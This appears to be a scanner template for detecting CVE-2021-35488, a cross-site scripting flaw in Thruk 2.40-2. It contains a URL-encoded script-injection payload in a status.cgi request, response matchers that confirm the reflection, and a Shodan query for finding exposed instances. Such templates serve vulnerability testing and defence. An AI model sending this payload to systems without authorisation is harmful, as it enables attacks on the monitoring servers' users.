id: CVE-2021-35488 info: name: Thruk 2.40-2 - Cross-Site Scripting author: arafatansari severity: medium description: | Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user. reference: - https://www.gruppotim.it/redteam - https://www.thruk.org/changelog.html - https://nvd.nist.gov/vuln/detail/CVE-2021-35488 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-35488 cwe-id: CWE-79 metadata: shodan-query: http.html:"Thruk" verified: "true" tags: cve,cve2021,thruk,xss requests: - method: GET path: - "{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - "'>" - "Thruk Monitoring" condition: and - type: status status: - 401 # Enhanced by md on 2022/09/08